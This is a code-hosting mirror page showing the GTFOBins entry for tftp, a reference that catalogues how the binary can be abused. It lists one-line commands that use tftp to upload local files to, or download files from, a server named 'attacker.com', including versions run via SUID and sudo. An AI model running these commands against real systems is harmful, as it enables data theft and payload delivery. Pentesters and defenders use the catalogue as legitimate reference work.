This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-06 03:34:59 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
0ba5df0cb984fd631efbf55a5adc8ec717720432
GTFOBins.github.io
/
_gtfobins
/
tftp.md
Emilio Pinna
53ad35fb10
Add suid-enabled and sudo-enabled to tftp
2018-07-22 18:24:39 +01:00
644 B
Raw
Blame
History
functions
functions
upload
download
suid-enabled
sudo-enabled
description
code
Send local file to a TFTP server.
RHOST=attacker.com tftp $RHOST put file_to_send
description
code
Fetch a remote file from a TFTP server.
RHOST=attacker.com tftp $RHOST get file_to_get
description
code
Send local file to a TFTP server.
RHOST=attacker.com ./tftp $RHOST put file_to_send
description
code
Send local file to a TFTP server.
RHOST=attacker.com sudo -E tftp $RHOST put file_to_send
Reference in New Issue
View Git Blame
Copy Permalink